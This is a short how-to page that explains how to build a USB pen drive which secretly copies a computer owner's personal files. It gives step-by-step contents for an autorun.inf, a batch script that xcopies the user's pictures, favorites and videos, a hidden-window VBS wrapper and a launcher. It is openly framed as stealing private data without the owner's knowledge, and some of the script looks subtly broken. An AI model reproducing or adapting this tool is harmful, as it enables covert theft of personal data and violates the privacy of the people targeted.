Trick to secretly copy and steal data to a USB Pendrive
Learn how to secretly copy and steal the private or personal data from any computer by just attaching a Pen drive.

This trick could prove to be very helpful and it would copy and steal all the data without the confirmation and knowing of computer owner.
To use this Trick just follow these simple steps:
- Open notepad.
- Copy and paste the following code into notepad:
[autorun]icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
- Save this file as autorun.inf.
- Open notepad again.
- Copy and paste the following code:
@echo off:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls
- Save this file as File.bat.
- Open notepad again.
- Copy and Paste the following code :
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
- Save this file as Invisible.vbs.
- Now again open notepad and Copy and Paste the following code:
wscript.exe \invisible.vbs file.bat
- Save this as Launch.bat.
- Now copy and paste all the four files created in the above steps to the USB Pen-drive.
- Create a folder named “Data” where the stolen contents would be copied automatically.
- Now it is done. The USB Pen-drive is ready to steal the secret data or files.